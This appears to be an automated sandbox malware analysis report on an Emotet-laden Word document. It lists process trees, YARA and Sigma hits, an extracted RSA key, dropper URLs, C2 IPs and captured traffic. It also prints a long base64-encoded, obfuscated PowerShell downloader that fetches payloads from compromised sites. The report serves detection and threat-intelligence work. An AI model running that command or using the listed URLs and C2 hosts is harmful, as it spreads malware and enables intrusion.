rundll32.exe (PID: 2340 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2336 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2816 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2760 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2460 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1492 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2800 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3032 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2244 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2098974182.0000000000180000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2102146226.0000000000270000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2106781352.0000000000691000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2093207161.0000000001CB4000.00000004.00000040.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f30:$s1: POwersheLL
00000007.00000002.2094781101.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2097726962.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2342697153.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2103138481.00000000001F1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2097776820.00000000001C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2102968277.00000000001D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2106704317.0000000000670000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2104274004.0000000000150000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2101214081.00000000006B1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2093170388.00000000002B6000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f10:$s1: POwersheLL
0000000B.00000002.2101161516.0000000000690000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2108288197.00000000001C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2108254547.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author
12.2.rundll32.exe.270000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.150000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.270000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.220000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.200000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1f0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2d0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1d0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.670000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.690000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.6b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.150000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.670000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.690000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.200000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.180000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.200000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.690000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.710000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.220000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.180000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.290000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.210000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 28 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://goldilockstraining.com/wp-includes/bftt/	Avira URL Cloud: Label: malware
Source: http://biglaughs.org/smallpotatoes/rRwRzc/	Avira URL Cloud: Label: malware
Source: http://paulscomputing.com/CraigsMagicSquare/H/	Avira URL Cloud: Label: malware
Source: http://goldcoastoffice365.com/temp/X/	Avira URL Cloud: Label: phishing
Source: http://goldcoastoffice365.com/temp/X/P	Avira URL Cloud: Label: phishing
Source: http://azraktours.com/wp-content/NWF9jC/	Avira URL Cloud: Label: malware
Source: http://josegene.com/theme/gU8/	Avira URL Cloud: Label: malware
Source: https://jeffdahlke.com/css/bg4n3/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: paulscomputing.com	Virustotal: Detection: 11%	Perma Link
Source: https://goldilockstraining.com/wp-includes/bftt/	Virustotal: Detection: 15%	Perma Link
Source: http://biglaughs.org/smallpotatoes/rRwRzc/	Virustotal: Detection: 16%	Perma Link
Source: http://paulscomputing.com	Virustotal: Detection: 11%	Perma Link
Source: http://paulscomputing.com/CraigsMagicSquare/H/	Virustotal: Detection: 19%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

ReversingLabs: Detection: 89%

Multi AV Scanner detection for submitted file

Show sources

Source: Doc.doc	Virustotal: Detection: 69%			Perma Link
Source: Doc.doc	ReversingLabs: Detection: 82%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002EA69B CryptDecodeObjectEx,

17_2_002EA69B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094179270.0000000002AE0000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E75F0 FindFirstFileW,

17_2_002E75F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: global traffic

DNS query: name: paulscomputing.com

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 167.71.148.58:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 216.218.207.98:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
Source: Traffic	Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.22:49171 -> 167.71.148.58:443

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://josegene.com/theme/gU8/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: https://jeffdahlke.com/css/bg4n3/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in memory: http://goldcoastoffice365.com/temp/X/

Source: global traffic

HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 167.71.148.58 167.71.148.58
Source: Joe Sandbox View	IP Address: 202.187.222.40 202.187.222.40

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
Source: Joe Sandbox View	ASN Name: SHAWCA SHAWCA

Source: global traffic

HTTP traffic detected: POST /7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/ HTTP/1.1DNT: 0Referer: 167.71.148.58/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/Content-Type: multipart/form-data; boundary=-----------------------cs0BVrSncg9DYPKmcW5iNvLUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7956Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_002E280B InternetReadFile,

17_2_002E280B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1AA7D61-551E-40AF-9919-E039C2A6E74E}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: paulscomputing.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://goldcoastoffice365.com/temp/X/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp	String found in binary or memory: http://goldcoastoffice365.com/temp/X/P
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://josegene.com/theme/gU8/
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp	String found in binary or memory: http://paulscomputing.com
Source: powershell.exe, 00000005.00000002.2094330849.0000000002CF2000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	String found in binary or memory: https://goldilockstraining.com/wp-includes/bftt/
